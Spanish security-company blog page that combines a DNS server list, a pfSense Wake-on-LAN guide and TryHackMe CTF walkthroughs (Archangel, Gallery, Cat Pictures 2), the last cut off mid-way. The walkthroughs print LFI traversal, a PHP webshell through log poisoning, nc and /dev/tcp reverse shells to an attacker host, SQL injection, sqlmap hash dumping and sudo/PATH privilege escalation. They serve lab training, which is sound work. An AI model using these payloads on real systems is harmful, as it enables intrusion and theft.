Descubre cómo los mejores Servidores DNS 2024 mejoran tu experiencia en internet. Conocidas como el «directorio telefónico» de la web, estas herramientas convierten las palabras en códigos numéricos, facilitando el acceso a sitios web. Aprende por qué cambiar las configuraciones predeterminadas de tu proveedor de servicios de internet (ISP) puede ofrecerte beneficios, desde un aumento en la velocidad de navegación hasta mayor seguridad.
¿Qué son las DNS y su Función?
Las DNS, o Sistema de Nombres de Dominio, traducen palabras en códigos numéricos para que las máquinas comprendan, actuando como un directorio telefónico de internet.
Los ISP asignan DNS predeterminadas, pero cambiarlas puede mejorar el rendimiento y proporcionar funciones adicionales sin infringir ninguna ley.
Ventajas de Cambiar a DNS más Rápidas:
Aumento de velocidad de navegación y acceso a nuevos sitios web.
Establecimiento de controles parentales y mejoras en la seguridad.
Combate de ataques cibernéticos y aumento de la privacidad.
Mejores Servidores DNS 2024:
Cloudflare DNS (1.1.1.1 / 1.0.0.1): Velocidad, privacidad y seguridad destacadas.
Google DNS (8.8.8.8 / 8.8.4.4): Simplicidad y rapidez con características de seguridad sólidas.
OpenDNS (208.67.222.222 / 208.67.222.123): Bloqueo y filtrado avanzado de contenidos.
Comodo Secure DNS (8.26.56.26 / 8.20.247.20): Potentes características de seguridad, pero con algunas preocupaciones de privacidad.
Quad9 (9.9.9.9): Colaboración con IBM para una fuerte seguridad sin registro de solicitudes.
Verisign DNS (64.6.64.6 / 64.6.65.6): Estabilidad y privacidad, aunque carece de opciones de personalización.
CleanBrowsing (185.228.168.9 / 185.228.169.9): Bloqueo eficaz de contenido para adultos.
AdGuard DNS (176.103.130.130 / 176.103.130.131): Especializado en bloquear anuncios y mejorar la seguridad.
Alternate DNS (76.76.19.19 / 76.223.122.150): Enfoque en bloquear anuncios y proteger contra malware.
Optimiza tu experiencia en línea al elegir las DNS que mejor se adapten a tus necesidades de velocidad, seguridad y privacidad. Recuerda que estas herramientas no solo mejoran la navegación, sino que también contribuyen a un entorno digital más seguro. Estos son bajo nuestro punto de vista los mejores Servidores DNS 2024. ¡Explora tus opciones y maximiza tu conexión a internet! Aquí os dejo una WEB con muchos más servidores DNS.
Cómo Cambiar a los Servidores DNS 2024 en tus Dispositivos: Guía Paso a Paso
Descubre cómo mejorar tu experiencia en internet cambiando los servidores DNS en tus dispositivos y usando los mejores Servidores DNS 2024. Sigue estos pasos para configurarlos de manera efectiva y disfrutar de beneficios como mayor velocidad y seguridad.
En Windows:
Ve al panel de control y selecciona «Conexiones de red».
Haz clic derecho y elige «Abrir configuración de red e internet».
Selecciona «Cambiar opciones del adaptador» y luego «Propiedades» de la red.
Activa el protocolo de internet versión 4 (TCP/IPv4) y haz clic en «Propiedades».
Habilita «Usar las siguientes direcciones de servidor DNS».
Ingresa las direcciones primaria y secundaria del nuevo servicio DNS.
Selecciona «Validar configuración al salir» y haz clic en aceptar.
En macOS:
Haz clic en la manzana y selecciona «Preferencias del sistema».
Busca y selecciona «Red» en el panel de iconos.
Elige la red específica y selecciona «Avanzado».
En la pestaña «DNS», agrega las direcciones primaria y secundaria.
Presiona «Aceptar» para aplicar los cambios.
En Android:
Ve a ajustes y elige «Wi-Fi».
Presiona el icono de ajustes junto a la red Wi-Fi.
Selecciona «Avanzados» y elige «Estático» en «Ajustes de IP».
Ingresa las direcciones primaria y secundaria del nuevo servicio DNS.
Guarda los cambios para que la DNS entre en funcionamiento.
En iOS:
Dirígete a ajustes y elige «Wi-Fi».
Pulsa la «i» junto a la red Wi-Fi y selecciona «Configurar DNS».
Cambia de «Automático» a «Manual».
Añade las direcciones primaria y secundaria del nuevo servicio DNS.
Presiona «Guardar» para aplicar la nueva configuración.
En Linux:
Abre la terminal y escribe «/etc/resolv.conf» seguido de «Enter».
Ubica la línea que inicia con «nameserver» y desplázala dos espacios hacia abajo.
En las líneas vacías, agrega las direcciones primaria y secundaria del nuevo servicio DNS.
Guarda los cambios con Ctrl + O y presiona «Enter».
En Routers:
Accede al sitio web de administrador del router usando la IP correspondiente.
Ingresa tus credenciales de usuario.
Busca «Configuración de red» y agrega las direcciones primaria y secundaria del nuevo servicio DNS.
Guarda los cambios y reinicia el router para aplicar la nueva DNS.
Optimiza tu conexión usando los mejores servidores DNS 2024, mejorando tanto la velocidad como la seguridad de tu experiencia en línea.
Confía en DCSeguridad
En un entorno digital cada vez más complejo, la protección de tus activos es esencial. DCSeguridad se erige como un aliado indispensable en este viaje hacia la seguridad informática. Sus Servicios de Ciberseguridad ofrecen un escudo integral, desde antivirus y firewalls hasta monitorización constante y respaldo online.
Al adoptar DCSeguridad, no solo inviertes en la protección contra amenazas cibernéticas conocidas, sino que también te anticipas y neutralizas las emergentes. La concienciación es clave, y estos servicios no solo resguardan tus datos, sino que educan sobre la importancia de la ciberseguridad.
Haz de DCSeguridad tu socio confiable, garantizando la integridad, confidencialidad y disponibilidad de tus activos digitales. Protege tu empresa con un escudo digital que va más allá, brindando tranquilidad y confianza en cada interacción en línea. La seguridad no es solo una medida, es una estrategia, y DCSeguridad está a la vanguardia. ¡Fortalece tu defensa digital hoy! Contacte con nosotros y únase a nuestro canal de Telegram.
Hoy en un cliente con políticas distribuidas para entre otras cosas apagar todos los ordenadores todas las noches, nos ha surgido la necesidad de Programar Wake on Lan en pfSense para arrancar uno de ellos todas las mañanas, ya que es un usuario que teletrabaja y necesita acceso a ese equipo. Para ello, lo hemos realizado mediante el firewall pfSense, y así encender el equipo con un cron programado, y aquí os dejamos este pequeño manual para que podáis programar esta opción.
¿Qué es Wake on Lan?
Wake on LAN (WoL) es una tecnología que permite encender de forma remota una computadora a través de la red. Utiliza la señal de red para enviar un paquete especial llamado «Magic Packet» a la dirección MAC (Media Access Control) de la computadora de destino, lo que provoca que la computadora se encienda desde un estado de suspensión o incluso desde un estado apagado. Esta funcionalidad es especialmente útil en entornos empresariales donde es necesario acceder a las computadoras de forma remota sin requerir la intervención física del usuario.
¿Para qué sirve Wake on Lan?
Wake on LAN se utiliza para encender computadoras de forma remota, lo que es útil en diversas situaciones, como acceder a sistemas de trabajo desde casa o realizar tareas de mantenimiento en servidores sin necesidad de estar físicamente presentes en el lugar donde se encuentra la computadora. Permite ahorrar energía al apagar las computadoras cuando no se están utilizando y encenderlas solo cuando sea necesario, lo que contribuye a reducir los costos de electricidad y el impacto ambiental.
¿Qué usos puede tener Wake on Lan?
Wake on LAN tiene una amplia variedad de usos, incluyendo:
Teletrabajo: Permite a los empleados encender sus computadoras de trabajo desde casa, lo que facilita el acceso a los archivos y aplicaciones necesarios para cumplir con sus tareas laborales.
Administración de Servidores: Los administradores de sistemas pueden encender servidores de forma remota para aplicar actualizaciones, solucionar problemas o realizar tareas de mantenimiento sin necesidad de estar físicamente presentes en el centro de datos.
Ahorro de Energía: Permite apagar las computadoras fuera del horario laboral y encenderlas solo cuando sea necesario, lo que contribuye al ahorro de energía y la reducción de costos.
Gestión de Activos: Facilita el seguimiento y la gestión de inventario de activos informáticos al poder encender y apagar computadoras de forma remota para realizar inventarios o actualizaciones de software.
¿Qué es pfSense?
pfSense es un sistema operativo de código abierto basado en FreeBSD y diseñado para funcionar como un firewall y enrutador de red. Ofrece una amplia gama de características avanzadas para asegurar las redes, incluyendo VPN, control de tráfico, balanceo de carga y filtrado de contenido. pfSense es altamente modular y puede ser configurado para satisfacer las necesidades específicas de una organización, lo que lo convierte en una opción popular para empresas y usuarios avanzados que buscan una solución de seguridad y enrutamiento robusta y personalizable.
Manual para programar Wake on Lan en pfSense
A continuación, se presenta un manual detallado para programar Wake on LAN en pfSense y encender un equipo de forma recurrente los días que sean necesarios.
Instalación de Cron en pfSense
Primero, asegúrate de tener el paquete cron instalado en tu firewall pfSense. Si aún no lo tienes, sigue estos pasos:
Accede a System -> Package Manager -> Available Packages.
Busca «Cron» y haz clic en +Install.
Confirma la instalación y espera a que termine.
Configuración del Cron
Accede a Services -> Cron en pfSense.
Haz clic en +Add para añadir una nueva tarea cron.
Configura el cron para encender el equipo todos los días de lunes a viernes a las 8:00 de la mañana. Para hacerlo, ajusta los campos de la siguiente manera:
X.X.X.X: con la IP de la máquina que quieres encender.
00:11:22:33:44:55: con la dirección MAC de la máquina que quieres encender.
Haz clic en Save para programar el cron. Ahora, el equipo se encenderá automáticamente todos los días laborables a las 8:00 de la mañana.
Con estos pasos, has configurado con éxito Wake on LAN en pfSense, permitiendo que tu usuario teletrabajador acceda al equipo que necesita incluso cuando está apagado.
Confía en DCSeguridad
Optimiza tu red con confianza. En DCSeguridad, ofrecemos soluciones expertas. ¡Contáctanos ahora y únete a nuestro canal de Telegram para estar al tanto de las últimas novedades y consejos de seguridad!
A continuación se presenta un manual paso a paso para realizar la máquina Archangel TryHackMe (https://tryhackme.com/room/archangel) el Hacking Ético en el desafío CTF. El manual incluye explicaciones sobre los comandos utilizados y sus respectivas banderas.
Nota: Este manual tiene fines educativos y solo debe ser utilizado en entornos controlados y con autorización.
Antes de empezar, recomendamos realizar los siguientes pasos preparativos:
Añade la IP de la máquina al archivo host
Crea un directorio con el nombre de la máquina para tener organizados los archivos
Crea un archivo para ir anotando todos los indicios que vayamos encontrando
Paso 1: Verificar la disponibilidad de la máquina
ping -c 1 <ip_máquina>
Este comando se utiliza para verificar la disponibilidad de la máquina objetivo mediante un ping.
El comando wfuzz se utiliza para buscar directorios y archivos ocultos en un servidor web. Los flags utilizados son:
-c: Ignora las respuestas con código de estado 404 (no encontrado).
--hc=404: Configura el código de estado que se debe ignorar.
-w /ruta_diccionario: Especifica la ruta del diccionario a utilizar.
-u http://ip/FUZZ: Establece la URL objetivo, donde «FUZZ» se reemplazará por las palabras del diccionario.
Este comando buscará directorios ocultos en el servidor web utilizando un diccionario de palabras.
Paso 4: Investigar directorio «flag» y redirecciones
burpsuite
Aquí no encontramos ninguna redirección rara, por lo que seguimos al siguiente paso, entrar en la web y encontrar el otro hostname que nos comentan. Cambia el archivo host para añadir el nuevo hostname encontrado.
Paso 5: Realizar escaneo de directorios con gobuster en Archangel TryHackMe
El comando gobuster se utiliza para realizar un escaneo de directorios y archivos en un servidor web. Los flags utilizados son:
dir: Realiza un escaneo de directorios.
-w /diccionario: Especifica la ruta del diccionario a utilizar.
-x php,html,txt: Establece las extensiones de archivo a buscar.
-t 100: Establece el número de hilos simultáneos.
-q: Muestra solo los resultados encontrados.
-u <ip_máquina>: Establece la URL objetivo.
Este escaneo revelará posibles directorios y archivos en la máquina objetivo, en esta ocasión vemos el archivo robots.txt, procedemos a acceder a él y vemos una página accesible, que vamos a ir a ella.
Paso 6: Investigar contenido de la nueva página
Explora el contenido del nuevo host encontrado en los pasos anteriores y busca pistas adicionales o banderas. También accede al archivo robots.txt y a la web encontrada en este archivo.
Paso 7: Local File Inclusion (LFI) Archangel TryHackMe
Accede al archivo /test.php para explorar una posible vulnerabilidad de Local File Inclusion (LFI). Esto podría proporcionar una vía de intrusión al sistema.
Vamos a probar a ver a que tenemos acceso en este servidor, para ello vamos a poner después de la carpeta de development /.././.././.././../etc/passwd para ver si tenemos acceso, el poner /.././ es para engañar al servidor y que no separa que estamos realizando un LFI, en otros casos, con /../../ y así sucesivamente podemos tener acceso a los archivos.
Tras esto vemos que tenemos acceso a ese archivo, y vemos los usuarios que pueden logarse en el servidor, como primera opción, y por probar, vamos a realizar un ataque con hydra: hydra -l archangel -P /dirección/diccionario <ip_máquina> ssh con esto no conseguimos nada, por lo que vamos a ver a que archivos tenemos acceso.
Vamos a ver los logs del apache, y ver si podemos hacer un ataque log poisoning para ello siguiendo la técnica anterior en vez de /etc/passwd accedemos a: /var/log/apache2/access.log, al tener acceso, vamos a proceder a realizar un ataque de log poisoning, si quieres aprender mas sobre esto, te dejo este enlace: https://ironhackers.es/tutoriales/lfi-to-rce-envenenando-ssh-y-apache-logs/
Paso 9: Log Poisoning Archangel TryHackMe
Para realizar el ataque abre burpsuite y captura el tráfico una vez capturado, mándalo directamente al repeater y realiza modificaciones en el campo «User-Agent» del encabezado de la petición. Cambia la parte entre paréntesis (X11; Linux...) por el siguiente código: <?php system($_GET['cmd']); ?>. Además, agrega &cmd=id después de .log en la URL. Luego, envía la petición y verifica sí recibes una respuesta con el ID del usuario «www-data».
Paso 10: Acceso remoto a la máquina objetivo
Reemplaza el &cmd=id del paso anterior por un reverse shell generado en https://www.revshells.com/. Utiliza el siguiente comando:
&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip_maquina_atacante> puerto >/tmp/f
Ahora selecciona desde el = hasta la f y debes de codificar la URL, para ello dale botón derecho Convert Selection -> URL -> encode-all-characters.
Ponte en escucha en tu máquina atacante el puerto especificado para obtener acceso remoto a la máquina objetivo utilizando Netcat (nc -nvlp puerto).
Dale a send y espera a tener el control de la máquina víctima.
Paso 11: Búsqueda de banderas y escalada de privilegios en Archangel TryHackMe
Una vez dentro de la máquina, busca las banderas y explora las opciones disponibles para la escalada de privilegios. Considera los binarios, capacidades, permisos de sudo y crontab para encontrar posibles vulnerabilidades y obtener privilegios adicionales.
Identifica un cron que se ejecuta cada minuto con el usuario «archangel».
Intenta realizar una escalada de privilegios aprovechando este cron. Edita el archivo utilizando el editor de texto Nano y reemplaza la línea «hello world» por el siguiente comando:
sh -i >& /dev/tcp/10.9.81.252/1234 0>&1
Abre otro terminal y ejecuta nc -nvlp 1234. Espera hasta que obtengas acceso a la máquina como el usuario «archangel». A partir de aquí, explora las opciones disponibles para la escalada de privilegios con este usuario.
Paso 12: Acceso a la carpeta «secret» y ejecución de comandos
Accede a la carpeta «secret» y examina los archivos presentes en ella. Si encuentras un archivo comprimido, investiga su contenido utilizando el comando string. Observa que se ejecuta comandos y busca la presencia del comando «cp».
Paso 13: Escalada de privilegios y obtención de acceso root en Archangel TryHackMe
Crea un archivo llamado «cp» y establece los siguientes permisos en él: chmod u+s /bin/bash. Luego, otorga permisos de lectura, escritura y ejecución a todos los usuarios utilizando el comando chmod 777 cp.
A continuación, agrega el comando «cp» al PATH mediante el comando export PATH=.:$PATH. Después, ejecuta el archivo de backup utilizando ./backup y, finalmente, ejecuta el comando bash -p para obtener acceso como usuario root.
¡La máquina ha sido completamente comprometida! Ahora, busca la última bandera para completar el desafío.
Recuerda que este manual está diseñado para un desafío CTF y solo debe ser utilizado con fines educativos en entornos controlados y con autorización.
Resumen Archangel TryHackMe
La máquina Archangel TryHackMe presenta los siguientes aspectos clave:
Escaneo de puertos: Se utiliza la herramienta Nmap para identificar los puertos abiertos en la máquina. Se descubren los puertos 80 y 22 abiertos, lo que indica la presencia de servicios web y SSH.
Búsqueda de directorios ocultos: Se emplea la herramienta wfuzz para encontrar directorios y archivos ocultos en el sitio web. Mediante el análisis de las respuestas obtenidas, se descubre un directorio llamado «flag».
Análisis de redirecciones: A través de Burp Suite, se analiza la redirección encontrada en el directorio «flag». Sin embargo, la redirección lleva a un video de YouTube y no proporciona información adicional relevante.
Exploración de directorios con gobuster: Se utiliza la herramienta gobuster para buscar directorios ocultos en el dominio encontrado en el host. Se espera a que gobuster finalice su exploración mientras se busca la primera bandera en la nueva página.
Explotación de una vulnerabilidad LFI: Se descubre un archivo accesible llamado «test.php», el cual resulta ser una vulnerabilidad de inclusión de archivos locales (LFI). Se aprovecha esta vulnerabilidad para realizar un ataque de log poisoning y obtener información privilegiada, como el ID del usuario «www-data».
Reverse Shell: Mediante la técnica de log poisoning, se logra establecer un reverse shell en la máquina objetivo. Esto proporciona acceso remoto a la máquina a través de una conexión inversa desde la máquina del atacante.
Escalada de privilegios: Se exploran diferentes opciones para la escalada de privilegios. Se encuentra un cron ejecutándose con el usuario «archangel» y se realiza una segunda escalada de privilegios modificando el archivo correspondiente. Esto permite obtener acceso al usuario «archangel» y se buscan otras opciones de escalada de privilegios.
Búsqueda de banderas: Durante el proceso de hacking, se busca y recopila información sobre las banderas ocultas en la máquina. Se debe encontrar la última bandera después de comprometer la máquina y obtener privilegios de root.
Estas son las principales técnicas y pasos utilizados durante el CTF para lograr comprometer la máquina objetivo y obtener acceso a la información privilegiada.
Confía en DCSeguridad:
Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.
Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!
Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!
Descubre cómo realizar pentesting en la máquina Galley TryHackMe (https://tryhackme.com/room/gallery666) con nuestro completo manual. Aprende los pasos de preparación, técnicas de hackeo y escalada de privilegios. Obtén un enfoque práctico para proteger y fortalecer tus habilidades en seguridad informática. ¡Sigue nuestra guía paso a paso y conviértete en un experto en ciberseguridad!
Paso 1: Preparación del entorno para resolver Galley TryHackMe
Antes de comenzar con el pentesting, es importante realizar los siguientes pasos de preparación:
Actualización del sistema operativo: Asegúrate de tener la versión más reciente del sistema operativo que utilizarás durante el proceso de pentesting. Esto te garantizará tener las últimas actualizaciones de seguridad y correcciones de errores.
Organización de archivos: Crea una carpeta dedicada para la máquina que estás analizando. Esto te permitirá mantener tus archivos y resultados organizados de manera efectiva a lo largo del proceso.
Configuración del archivo de hosts: Agrega la dirección IP de la máquina que estás analizando al archivo de hosts de tu sistema. Esto facilitará el acceso a la máquina durante el proceso de pentesting.
Registro de indicios: Crea un archivo o registro donde puedas documentar todos los posibles indicios y hallazgos que descubras durante el análisis. Esto te ayudará a llevar un seguimiento ordenado y completo de tu progreso y resultados.
Realizar estos pasos de preparación garantizará que tengas un entorno adecuado y organizado para llevar a cabo el pentesting de manera eficiente.
Paso 2: Comienza el Hackeo en Galley TryHackMe
Una vez que hayas preparado el entorno, procede con los siguientes pasos para iniciar el hackeo:
Comprobación de disponibilidad: Para verificar si la máquina objetivo está en línea, utiliza el comando ping -c 1 [ip_maquina]. Esto enviará un solo paquete de ping a la dirección IP de la máquina y te indicará si está accesible.
Enumeración de puertos abiertos: Utiliza el siguiente comando para identificar los puertos abiertos en la máquina objetivo y responder la primera pregunta planteada:
Este comando utiliza Nmap para realizar un escaneo exhaustivo de la máquina y muestra información detallada sobre los servicios y versiones en los puertos abiertos. El resultado revelará que los puertos 80 y 8080 están abiertos.
Escaneo web con WhatWeb: A continuación, utiliza el comando whatweb [ip_maquina]:80 y whatweb [ip_maquina]:8080 para realizar un escaneo web en los puertos abiertos. Esto proporcionará información sobre las tecnologías y aplicaciones utilizadas en los servicios web.
Exploración de la aplicación con Dirb: Para buscar posibles directorios y archivos ocultos en la aplicación web que se encuentra en el puerto 8080, ejecuta el siguiente comando:
dirb http://gallery.thm:8080
Dirb realizará un análisis exhaustivo de la aplicación en busca de rutas y archivos que puedan ser relevantes para el hackeo.
Paso 3: Búsqueda de Exploits
Después de realizar los pasos anteriores sin encontrar resultados, es hora de buscar posibles exploits que puedan ser aprovechados en la versión de «Simple Image Gallery». Sigue los siguientes pasos:
Utiliza la herramienta searchsploit para buscar exploits relacionados con la versión de «Simple Image Gallery»:
searchsploit simple image gallery
Este comando buscará en la base de datos de exploits de la herramienta «searchsploit» y mostrará posibles exploits disponibles para la versión específica de «Simple Image Gallery».
Encuentra y selecciona dos posibles exploits que parezcan relevantes para tu objetivo.
Prueba el primer exploit seleccionado que permita una inyección SQL en el campo de inicio de sesión. Por ejemplo, si el exploit muestra una inyección SQL exitosa utilizando el usuario «admin» con la siguiente cadena: admin' or '1'='1'#, realiza la inyección en el campo de inicio de sesión para loguearte como administrador:
username: admin' or '1'='1'#
password: [deja en blanco]
Si la inyección SQL tiene éxito, obtendrás acceso al sitio como administrador.
Una vez dentro del sitio, explora las funcionalidades y opciones disponibles. Observa la sección de álbumes y verifica que existe la posibilidad de subir una «shell reversa».
Configura un listener en tu máquina atacante utilizando netcat para escuchar conexiones entrantes en un puerto específico:
nc -nlvp [puerto]
Haz clic en la opción de subir archivo para subir una «shell reversa» en el sitio web. Esto iniciará una conexión a tu máquina atacante y proporcionará acceso al servidor objetivo.
Paso 4: Segundo Exploit y Obtención del Hash de Contraseña
Salimos del Shell reverso y vamos a explorar otras opciones, con el otro exploit, para volver al shell reverso tenemos tiempo, y además aprenderemos nuevas formas de ataques y obtención de objetivos.
Abre Burp Suite y captura una solicitud HTTP cuando cargas una imagen en la aplicación. Guarda la solicitud capturada en un archivo llamado «test.req».
Utiliza la herramienta sqlmap para analizar la solicitud capturada y obtener información sobre las bases de datos presentes en la aplicación:
sqlmap -r test.req --dbs
Este comando enviará la solicitud capturada a la herramienta sqlmap, que analizará la estructura de la base de datos en busca de posibles vulnerabilidades.
Una vez obtenidos los nombres de las bases de datos, como «gallery_db» e «information_schema», ejecuta el siguiente comando para enumerar las tablas en la base de datos seleccionada:
sqlmap -r test.req -D database_name --tables
Reemplaza «database_name» por el nombre de la base de datos que deseas explorar.
Ahora, para obtener información sobre los usuarios y sus hashes de contraseña, ejecuta el siguiente comando:
Reemplaza «database_name» por el nombre de la base de datos y «table_name» por el nombre de la tabla que contiene los datos de los usuarios. Este comando extraerá la información de los usuarios, incluyendo los hashes de contraseña, si están disponibles.
Paso 5: Volver a la Shell Reversa en Galley TryHackMe
En este paso, retomaremos el uso de la shell reversa para obtener acceso al servidor objetivo. Sigue los siguientes pasos:
Configura una shell reversa en la máquina atacante para establecer la conexión con el servidor. Para mejorar la shell reversa, utiliza el siguiente comando:
script /dev/null -c bash
Esta línea de comando mejorará la interactividad y estabilidad de la shell reversa.
Exporta la variable de entorno «TERM» a «xterm» para asegurar una correcta visualización del terminal:
export TERM=xterm
Monta un servidor HTTP en tu máquina atacante utilizando Python para transferir el archivo «linpeas.sh» al servidor objetivo. Ejecuta el siguiente comando:
python3 -m http.server
Esto iniciará un servidor HTTP en tu máquina atacante.
En la máquina víctima, accede a un directorio en el que tengas los permisos necesarios y descarga el archivo «linpeas.sh» desde tu servidor atacante. Por ejemplo, si has elegido el directorio «/tmp», utiliza el siguiente comando:
wget [tu_ip]:8000/linpeas.sh -O /tmp/linpeas.sh
Asegúrate de reemplazar «[tu_ip]» con la dirección IP de tu máquina atacante.
Otorga permisos de ejecución al archivo «linpeas.sh»:
chmod +x /tmp/linpeas.sh
Ejecuta el script «linpeas.sh» para buscar vulnerabilidades en el sistema:
bash /tmp/linpeas.sh
Espera a que el script finalice su ejecución y analiza los resultados en busca de posibles vulnerabilidades.
Durante el análisis, es posible que descubras una contraseña de usuario. Prueba esta contraseña con el usuario «mike» utilizando el siguiente comando:
su mike
Si la contraseña es correcta, ahora tendrás acceso como el usuario «mike».
Verifica los permisos disponibles para tu usuario utilizando el comando:
sudo -l
Observa si tienes permisos para ejecutar archivos con la ruta «/bin/bash» utilizando el comando «sudo».
Paso 6: Escalada de Privilegios Final para Galley TryHackMe
En este paso, realizaremos la escalada final de privilegios utilizando una vulnerabilidad específica en el comando nano. Sigue los siguientes pasos:
Al hacer cat en el archivo en cuestión, descubrimos que podemos escalar privilegios utilizando nano con la opción read. Para obtener más información sobre cómo aprovechar esta vulnerabilidad, sigue las instrucciones detalladas en el siguiente enlace: https://gtfobins.github.io/gtfobins/nano/#sudo
Vamos a obtener una shell mejorada utilizando los siguientes pasos:
Escribe script /dev/null -c bash en la línea de comandos y presiona Ctrl+Z para suspender el proceso.
Una vez en tu terminal, escribe - stty raw -echo ; fg y presiona Enter. Esto reanudará la ejecución del proceso suspendido.
Ahora estarás de vuelta en la shell. Escribe reset y presiona Enter.
Ejecuta el comando sudo -l para verificar los privilegios disponibles. Observa la opción encontrada para ejecutar sudo /bin/bash /opt/rootkit.sh. Sin embargo, es posible que recibas un error de terminal.
Para solucionar el error de terminal, escribe export TERM=xterm y presiona Enter.
Ahora, ejecuta nuevamente el comando sudo /bin/bash /opt/rootkit.sh y en las opciones de nano, elige read.
Ahora, realiza los siguientes pasos en nano:
^R^X (Ctrl+R, Ctrl+X)
Esto te proporcionará una línea de comandos en la parte inferior de nano. Escribe:
reset; sh 1>&0 2>&0
Esto establecerá una nueva sesión de shell.
¡Ahora serás el usuario root! Puedes obtener la última bandera y realizar cualquier acción como root.
Siguiendo estos pasos, lograrás la escalada final de privilegios y obtendrás acceso como usuario root. Asegúrate de seguir las mejores prácticas de seguridad y actuar de manera ética en todo momento.
Resumen del proceso y tipo de máquina trabajada:
En este manual, se ha seguido un proceso paso a paso para realizar el pentesting de la máquina Gallery en Try Hack Me. Se han cubierto los siguientes aspectos clave:
Preparación del entorno: Actualización del sistema operativo, organización de archivos, configuración del archivo de hosts y registro de indicios.
Comienzo del hackeo: Comprobación de disponibilidad, enumeración de puertos abiertos, escaneo web con WhatWeb y exploración de la aplicación con Dirb.
Búsqueda de exploits: Utilización de la herramienta «searchsploit» para buscar exploits relacionados con la versión de «Simple Image Gallery» y prueba de exploits seleccionados.
Obtención del hash de contraseña: Captura de una solicitud HTTP con Burp Suite, análisis de la solicitud con «sqlmap» para obtener información sobre las bases de datos, tablas y usuarios, y extracción de los hashes de contraseña.
Volver a la shell reversa: Configuración de la shell reversa, transferencia de archivos y búsqueda de vulnerabilidades en el sistema.
Escalada de privilegios final: Utilización de una vulnerabilidad en el comando «nano» para realizar la escalada de privilegios hasta el usuario «root».
Según la experiencia proporcionada, la máquina Gallery de Try Hack Me es una máquina de nivel intermedio, aunque en la plataforma es fácil. Proporciona la oportunidad de practicar varias técnicas de pentesting, incluyendo enumeración de puertos, análisis de aplicaciones web, búsqueda de exploits, obtención de información de bases de datos y escalada de privilegios. Este tipo de máquinas son ideales para aquellos que desean mejorar sus habilidades en seguridad informática y familiarizarse con los procesos y herramientas utilizados en el pentesting.
Confía en DCSeguridad:
Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.
Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!
Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!
Este manual proporcionará una guía detallada para llevar a cabo una prueba de penetración en la máquina Cat Pictures 2 TryHackMe https://tryhackme.com/room/catpictures2. Está diseñado específicamente para aquellos que se están iniciando en el campo del pentesting, por lo que se explicarán los puntos más importantes en un lenguaje claro y profesional.
Antes de comenzar, es crucial recordar que debes obtener los permisos adecuados y autorización antes de realizar cualquier actividad de pentesting en sistemas o redes que no te pertenezcan. El cumplimiento de la ética y las regulaciones es fundamental en este campo.
Paso 1: Preparación inicial para Cat Pictures 2 TryHackMe
Antes de iniciar la prueba de penetración, es necesario realizar algunas tareas de preparación:
Crea un directorio de trabajo específico para este proyecto y cámbiate al directorio correspondiente. Esto ayudará a organizar tus archivos y facilitará la gestión de la prueba de penetración.
Agrega la dirección IP de la máquina Cat Pictures 2 a tu archivo de hosts. Esto simplificará el acceso a la máquina durante la prueba.
Paso 2: Actualización del sistema
Es recomendable comenzar por actualizar el sistema objetivo con las últimas actualizaciones disponibles. Esto garantizará que se aprovechen las correcciones de seguridad más recientes, lo que puede dificultar la explotación de vulnerabilidades conocidas.
Paso 3: Identificación de la máquina objetivo
Antes de iniciar cualquier exploración, es útil determinar si la máquina objetivo está en línea y obtener información básica sobre ella. Para hacerlo, realiza un ping a la máquina utilizando el siguiente comando:
ping -c 1 <dirección IP>
Este comando enviará un solo paquete de ping y mostrará la respuesta. Al verificar la conectividad y el valor TTL (Time to Live), podrás identificar el sistema operativo en uso.
Paso 4: Escaneo de puertos de Cat Pictures 2 TryHackMe
El siguiente paso consiste en realizar un escaneo de puertos para identificar los servicios que se ejecutan en la máquina. Utilizaremos la herramienta nmap con una serie de opciones para obtener información detallada:
Este comando realizará un escaneo exhaustivo de puertos, incluyendo la detección de servicios, versiones, scripts y generará un archivo de salida en formato CSV llamado nmap_inicial.txt.
Analiza el archivo nmap_inicial.txt para identificar los puertos abiertos. Presta especial atención a los puertos 22, 80, 222, 3000 y 8080, ya que se encontraron servicios SSH y servicios web en estos puertos.
Paso 5: Enumeración de directorios web en Cat Pictures 2 TryHackMe
A continuación, procederemos a enumerar los directorios en los servicios web encontrados en los puertos 80, 3000 y 8080 utilizando la herramienta dirb. Ejecuta los siguientes comandos para cada puerto:
dirb http://<dirección IP>:<puerto>
Analiza cuidadosamente los resultados de la enumeración de directorios en busca de posibles puntos de entrada adicionales.
Paso 6: Análisis de imágenes y metadatos
Después de revisar los directorios y no encontrar resultados significativos, nos centraremos en la exploración de los servicios web. Comenzaremos analizando la página de gatos en el puerto 80.
Después de investigar durante un tiempo, descubrimos que una de las imágenes en la pestaña «información» contiene pistas sobre los siguientes pasos. Descarga esta imagen utilizando el comando wget:
Una vez que hayas descargado la imagen, realiza un análisis de metadatos utilizando la herramienta exiftool:
exiftool imagen.jpg
Examina los metadatos de la imagen y busca cualquier información relevante, como títulos ocultos o datos incrustados. Accede a lo que encuentras y Voalà, ya tienes unas credenciales de acceso.
Paso 7: Acceso a Gitea y descubrimiento de credenciales
